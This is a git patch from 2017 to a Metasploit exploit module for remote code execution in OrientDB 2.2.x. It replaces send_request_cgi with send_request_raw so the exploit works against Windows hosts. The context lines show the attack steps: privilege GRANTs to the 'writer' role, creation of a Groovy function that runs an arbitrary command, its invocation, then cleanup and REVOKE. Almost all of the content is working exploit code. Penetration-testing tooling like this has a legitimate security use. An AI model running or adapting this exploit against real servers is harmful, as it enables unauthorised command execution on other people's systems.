From 30664924c8daa040e2e7b3f2aafca20c767b318f Mon Sep 17 00:00:00 2001
From: Ricardo Almeida <ricardojba1@gmail.com>
Date: Wed, 26 Jul 2017 13:59:14 +0100
Subject: [PATCH] Orientdb 2.2.x RCE - Reverted to send_request_raw due to
 issues exploiting windows boxes

---
 modules/exploits/multi/http/orientdb_exec.rb | 21 ++++++++------------
 1 file changed, 8 insertions(+), 13 deletions(-)

diff --git a/modules/exploits/multi/http/orientdb_exec.rb b/modules/exploits/multi/http/orientdb_exec.rb
index 62cb4263af..0a42b163e3 100644
--- a/modules/exploits/multi/http/orientdb_exec.rb
+++ b/modules/exploits/multi/http/orientdb_exec.rb
@@ -51,7 +51,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def check
     uri = target_uri
     uri.path = normalize_uri(uri.path)
-    res = send_request_cgi({'uri' => "#{uri.path}listDatabases"})
+    res = send_request_raw({'uri' => "#{uri.path}listDatabases"})
     if res and res.code == 200 and res.headers['Server'] =~ /OrientDB Server v\.2\.2\.[2-9]|1[0-9]|2[0-2]/
       print_good("Version: #{res.headers['Server']}")
       return Exploit::CheckCode::Vulnerable
@@ -67,12 +67,11 @@ class MetasploitModule < Msf::Exploit::Remote
     request_parameters = {
       'method'    => 'POST',
       'uri'       => normalize_uri(@uri.path, "/document/#{opts}/-1:-1"),
-      'encode_params' => false,
       'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
       'headers' => { 'Accept' => '*/*', 'Content-Type' => 'application/json;charset=UTF-8' },
       'data' => "{\"@class\":\"ofunction\",\"@version\":0,\"@rid\":\"#-1:-1\",\"idempotent\":null,\"name\":\"#{func_name}\",\"language\":\"groovy\",\"code\":\"#{java_craft_runtime_exec(cmd)}\",\"parameters\":null}"
     }
-    res = send_request_cgi(request_parameters)
+    res = send_request_raw(request_parameters)
     if not (res and res.code == 201)
       begin
         json_body = JSON.parse(res.body)
@@ -85,12 +84,11 @@ class MetasploitModule < Msf::Exploit::Remote
     request_parameters = {
       'method'    => 'POST',
       'uri'       => normalize_uri(@uri.path, "/function/#{opts}/#{func_name}"),
-      'encode_params' => false,
       'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
       'headers' => { 'Accept' => '*/*', 'Content-Type' => 'application/json;charset=UTF-8' },
       'data' => ""
     }
-    req = send_request_cgi(request_parameters)
+    req = send_request_raw(request_parameters)
     if not (req and req.code == 200)
       begin
         json_body = JSON.parse(res.body)
@@ -113,12 +111,11 @@ class MetasploitModule < Msf::Exploit::Remote
     request_parameters = {
       'method'    => 'DELETE',
       'uri'       => normalize_uri(@uri.path, "/document/#{opts}/#{func_id}"),
-      'encode_params' => false,
       'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
       'headers' => { 'Accept' => '*/*' },
       'data' => ""
     }
-    rer = send_request_cgi(request_parameters)
+    rer = send_request_raw(request_parameters)
     if not (rer and rer.code == 204)
       begin
         json_body = JSON.parse(res.body)
@@ -159,7 +156,7 @@ class MetasploitModule < Msf::Exploit::Remote
     vprint_status("Attempting to execute: #{cmd}")
     @uri = target_uri
     @uri.path = normalize_uri(@uri.path)
-    res = send_request_cgi({'uri' => "#{@uri.path}listDatabases"})
+    res = send_request_raw({'uri' => "#{@uri.path}listDatabases"})
     if res && res.code == 200 && res.body.length > 0
       begin
         json_body = JSON.parse(res.body)["databases"]
@@ -199,7 +196,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def exploit
     @uri = target_uri
     @uri.path = normalize_uri(@uri.path)
-    res = send_request_cgi({'uri' => "#{@uri.path}listDatabases"})
+    res = send_request_raw({'uri' => "#{@uri.path}listDatabases"})
     if res && res.code == 200 && res.body.length > 0
       begin
         json_body = JSON.parse(res.body)["databases"]
@@ -221,12 +218,11 @@ class MetasploitModule < Msf::Exploit::Remote
         'method'    => 'POST',
         'uri'       => normalize_uri(@uri.path, "/command/#{targetdb}/sql/-/20"),
         'vars_get' => { 'format' => 'rid,type,version,class,graph' },
-        'encode_params' => false,
         'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
         'headers' => { 'Accept' => '*/*' },
         'data' => "GRANT #{priv} ON #{item} TO writer"
        }
-       res = send_request_cgi(request_parameters)
+       res = send_request_raw(request_parameters)
       end
     end
     # Exploit
@@ -249,12 +245,11 @@ class MetasploitModule < Msf::Exploit::Remote
         'method'    => 'POST',
         'uri'       => normalize_uri(@uri.path, "/command/#{targetdb}/sql/-/20"),
         'vars_get' => { 'format' => 'rid,type,version,class,graph' },
-        'encode_params' => false,
         'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
         'headers' => { 'Accept' => '*/*' },
         'data' => "REVOKE #{priv} ON #{item} FROM writer"
        }
-       res = send_request_cgi(request_parameters)
+       res = send_request_raw(request_parameters)
       end
     end
    end